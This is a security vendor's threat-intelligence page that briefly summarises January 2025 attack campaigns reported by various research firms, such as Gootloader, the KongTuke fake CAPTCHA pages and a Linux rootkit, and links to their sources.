Securonix Threat Labs

Get up-to-date threat content from the experts at Securonix Threat Labs.

Uncover the threats of tomorrow, today.

Securonix Threat Labs helps your team fend off rising threats by bringing the industry’s brightest minds together to equip you with the latest countermeasures and best practices.

securonix autonomous threat sweep detection report sample

Powered by Threat Labs

Autonomous Threat Sweeper

Acting as your own dedicated Cyber Rapid Response Team, Securonix Autonomous Threat Sweeper (ATS) automatically and retroactively hunts for new and emerging threats based on the latest threat intelligence from our Threat Labs Team.

Latest ATS Entries

All indicators of compromise (IOC) and Spotter queries are available on our GitHub repository.

2025-01-19
SEO_Manipulation_by_Gootloader
LOW
+
Intel Source:
sophos
Intel Name:
SEO_Manipulation_by_Gootloader
Date of Scan:
2025-01-19
Impact:
LOW
Summary:
Researchers at Sophos have recreated the server-side activities of the Gootloader virus, which is an SEO-driven threat that uses infected WordPress sites to entice victims. Gootloader uses hijacked Google search results to send users to legitimate sites that have been altered to display simulated message boards with malware links embedded in seemingly relevant talks.
Source: https://news.sophos.com/en-us/2025/01/16/gootloader-inside-out/
2025-01-19
IoT_Botnet_Targets_Global_Networks
LOW
+
Intel Source:
Trend Micro
Intel Name:
IoT_Botnet_Targets_Global_Networks
Date of Scan:
2025-01-19
Impact:
LOW
Summary:
Researchers at Trend Micro have observed large-scale DDoS attacks orchestrated by an IoT botnet, especially targeting enterprises in Japan but also abroad. The botnet, which includes malware variants inspired from Mirai and Bashlite, attacks IoT devices such as wireless routers and IP cameras by exploiting vulnerabilities and weak passwords. These infected devices communicate with command-and-control servers, launching various DDoS attacks, upgrading malware, and enabling proxy services.
Source: https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html
2025-01-18
FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day
MEDIUM
+
Intel Source:
Arctic Wolf
Intel Name:
FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day
Date of Scan:
2025-01-18
Impact:
MEDIUM
Summary:
Arctic Wolf Labs researchers have observed a recent campaign targeting Fortinet FortiGate firewalls with exposed management interfaces on the public internet. Threat actors gained unauthorized access, creating new accounts, modifying configurations, and extracting credentials. While the initial access vector remains unconfirmed, there is high confidence that a zero-day vulnerability is involved.
Source: https://arcticwolf.com/resources/blog/console-chaos-targets-fortinet-fortigate-firewalls/
2025-01-18
Analyzing_a_Web_Shell_Intrusion
LOW
+
Intel Source:
Trend Micro
Intel Name:
Analyzing_a_Web_Shell_Intrusion
Date of Scan:
2025-01-18
Impact:
LOW
Summary:
Trend Micro researchers investigated a customer incident involving suspicious activity detected by endpoint sensors. The IIS worker (w3wp.exe) on a public-facing server was compromised when an attacker uploaded a web shell, which was initially unrestricted. This allowed the attacker to create a new account and modify an existing user's password. The attacker also used an encoded PowerShell command to establish a reverse TCP shell for command-and-control communication. Further investigation revealed multiple payloads downloaded to the system, and the attacker’s initial access was traced through web server requests interacting with the web shell.
Source: https://www.trendmicro.com/en_us/research/25/a/investigating-a-web-shell-intrusion-with-trend-micro--managed-xd.html
2025-01-18
RansomHub_Affiliate_Uses_Python_Based_Backdoor
MEDIUM
+
Intel Source:
GuidePoint
Intel Name:
RansomHub_Affiliate_Uses_Python_Based_Backdoor
Date of Scan:
2025-01-18
Impact:
MEDIUM
Summary:
GuidePoint security researchers have uncovered Python-based backdoor being used by a threat actor to maintain access to compromised devices. The attack starts with initial access through fake malware updates which often impersonate legitimate software updates to trick users and after 20 minutes of initial infection, the Python backdoor is installed on the compromised device. The attackers then use RDP to spread the infection to the other systems in the network and deploy more Python backdoors. The attackers ultimately leverage their access to deploy RansomHub ransomware across the network for encrypting the data.
Source: https://www.guidepointsecurity.com/blog/ransomhub-affiliate-leverage-python-based-backdoor/
2025-01-18
Nickel_Tapestry_Fraud_Connections
LOW
+
Intel Source:
Secureworks
Intel Name:
Nickel_Tapestry_Fraud_Connections
Date of Scan:
2025-01-18
Impact:
LOW
Summary:
Researchers at Secureworks Counter Threat Unit have discovered linkages between North Korean IT worker schemes and a 2016 crowdfunding scam. The schemes, attributed to the NICKEL TAPESTRY threat group, included front firms such as Yanbian Silverstar in China and Volasys Silver Star in Russia, both of which were sanctioned by the United States Department of Treasury in 2018.
Source: https://www.secureworks.com/blog/nickel-tapestry-infrastructure-associated-with-crowdfunding-scheme
2025-01-17
Star_Blizzard_Targets_WhatsApp_Accounts
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Star_Blizzard_Targets_WhatsApp_Accounts
Date of Scan:
2025-01-17
Impact:
MEDIUM
Summary:
Microsoft researchers have identified that Russian threat actor known as Star Blizzard is using new tactic to target victims through WhatsApp. This group often targets government officials, diplomats, defense policy researchers and those aiding Ukraine in the war with Russia. In this campaign, they leverage spear-phishing emails impersonating a U.S. government official that contain QR code which encourage users to join WhatsApp group supporting Ukraine NGOs. However, the QR code is non- functional then user responds and attackers send another email containing a link which redirects the target to a webpage where they are asked to scan a fake QR code linked to WhatsApp account to attacker’s device. This allows the attacker to access the victim’s WhatsApp messages and potentially steal data using browser plugins.
Source: https://www.microsoft.com/en-us/security/blog/2025/01/16/new-star-blizzard-spear-phishing-campaign-targets-whatsapp-accounts/
2025-01-17
KongTuke_Campaign_Exploits_BOINC
LOW
+
Intel Source:
PaloAlto
Intel Name:
KongTuke_Campaign_Exploits_BOINC
Date of Scan:
2025-01-17
Impact:
LOW
Summary:
KongTuke is a malicious campaign involving injected scripts that create fake "verify you are human" pages on websites. These pages trick users into executing a malicious PowerShell script by copying it into their clipboard and following instructions to run it. The script leads to an infection that exploits BOINC (Berkeley Open Infrastructure for Network Computing), a legitimate platform often used by research organizations. The attackers set up rogue BOINC project servers with domains like rosettahome[.]cn and rosettahome[.]top, attempting to disguise them as legitimate rosetta@home servers. However, these servers are unrelated to rosetta@home and are used for malicious purposes in the campaign.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-13-IOCs-for-Kongtuke-activity.txt
2025-01-17
Exploitation_of_Aviatrix_Controller_Vulnerability
MEDIUM
+
Intel Source:
WIZ
Intel Name:
Exploitation_of_Aviatrix_Controller_Vulnerability
Date of Scan:
2025-01-17
Impact:
MEDIUM
Summary:
A critical vulnerability CVE-2024-50603 has been identified that affects the Aviatrix Controller which allow attackers to execute commands on the system remotely without authentication. This vulnerability happens because the software does not properly handle user input in its API. The impact of this vulnerability is severe when the Aviatrix Controller is deployed in AWS cloud environments because it can also give attackers high privilege accesses. Researchers also observed that attackers exploiting this flaw in the wild to mine cryptocurrency and install backdoors.
Source: https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603
2025-01-17
Deep_Dive_Into_a_Linux_Rootkit_Malware
LOW
+
Intel Source:
Fortinet
Intel Name:
Deep_Dive_Into_a_Linux_Rootkit_Malware
Date of Scan:
2025-01-17
Impact:
LOW
Summary:
Fortinet researchers have analyzed rootkit malware that infects Linux systems using zero-day exploit. The malware has two components - kernel module and a user-space program. The kernel module creates hidden communication channel by using Linux system file and hijack network traffic. It establishes a secure session and processes encrypted commands which enable the attacker to restart processes or execute system commands with root privileges. The user-space program pretends to be normal but secretly runs the attacker's commands in the background coordinating with the kernel module.
Source: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware

Threat Content

Shared Security Content on Sigma

Securonix Threat Labs publishes up-to-date IOCs and threat hunting queries on Sigma, allowing you to tap into a vast community of collective defense and stay ahead of emerging threat research.

securonix in github dashboard

Why Security Content Matters

Learn how Securonix is paving the way to make precise, and actionable security content a reality for our customers.